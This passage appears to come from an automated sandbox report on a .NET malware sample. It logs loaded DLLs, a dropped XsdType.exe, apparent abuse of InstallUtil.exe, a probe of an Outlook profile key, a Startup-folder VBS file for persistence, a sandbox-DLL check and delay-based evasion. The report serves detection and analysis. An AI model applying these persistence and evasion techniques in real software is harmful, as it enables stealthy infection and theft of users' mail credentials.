Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: pbgjw8i8N7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: pbgjw8i8N7.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: pbgjw8i8N7.exe | Static file information: File size 2034176 > 1048576
Source: pbgjw8i8N7.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1f0000
Source: pbgjw8i8N7.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e | source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb | source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq | source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb | source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: pbgjw8i8N7.exe, EncryptorIterator.cs | .Net Code: PresentEncryptor System.AppDomain.Load(byte[])
Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.pbgjw8i8N7.exe.3a7d570.3.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.5380000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.5380000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1353040747.0000000005380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_04E94FE1 push ss; iretd 0_2_04E94FE2
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_05121D72 push ss; retf 0_2_05121D73
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_0512A992 push edx; iretd 0_2_0512A995
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_0512D84A push eax; ret 0_2_0512D881
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_0512260B push cs; retf 0_2_05122611
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_051EED5B pushfd ; iretd 0_2_051EED61
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_051EB45F push es; iretd 0_2_051EB461
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_051E0722 push E9FFFFFFh; ret 0_2_051E0728
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_051EF1C6 push eax; iretd 0_2_051EF1C7
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_051EA84E push 928D24B0h; retf 0_2_051EA85B
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_05268404 pushad ; iretd 0_2_05268405
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Code function: 0_2_052683AA pushad ; iretd 0_2_052683AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_00CE28B0 push ds; iretd 1_2_00CE28BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_00CE6C10 pushfd ; iretd 1_2_00CE6C1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_00CE3068 push ss; iretd 1_2_00CE3076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_00CE3020 push ss; iretd 1_2_00CE3046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_00CEF7CC push ebp; iretd 1_2_00CEF7CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_00CE3890 push ds; iretd 1_2_00CE3896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_00CE3A42 push ds; iretd 1_2_00CE3A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_00CE7DA1 push es; ret 1_2_00CE7DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_064B8445 push es; ret 1_2_064B8448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_064BC0FD push es; iretd 1_2_064BC210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_064B851A push es; ret 1_2_064B8520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_064B2512 push esp; ret 1_2_064B2519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_064B25B0 pushfd ; ret 1_2_064B25B1
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 3_2_0506CC4D push 73E8050Ah; iretd 3_2_0506CC52
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 3_2_05064FE1 push ss; iretd 3_2_05064FE2
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 3_2_0506E09C push ebx; iretd 3_2_0506E09D
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 3_2_0506E234 push edx; iretd 3_2_0506E235
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 3_2_051BA992 push edx; iretd 3_2_051BA995
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Code function: 3_2_0527B45F push es; iretd 3_2_0527B461
Source: pbgjw8i8N7.exe | Static PE information: section name: .text entropy: 7.19209181797832
Source: XsdType.exe.0.dr | Static PE information: section name: .text entropy: 7.19209181797832
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | File created: C:\Users\user\AppData\Roaming\XsdType.exe

Boot Survival

Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match - File source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe - Memory allocated: E70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe - Memory allocated: 2970000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe - Memory allocated: 27A0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Memory allocated: 2890000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Memory allocated: 2B20000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Memory allocated: 2A30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe - Memory allocated: E00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe - Memory allocated: 2A10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe - Memory allocated: 2860000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Memory allocated: 2240000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Memory allocated: 23C0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Memory allocated: 43C0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 600000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599844
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599719
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599594
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 599110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 598110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 597110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596970
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596846
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596719
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 596110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595985
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Thread delayed: delay time: 595610
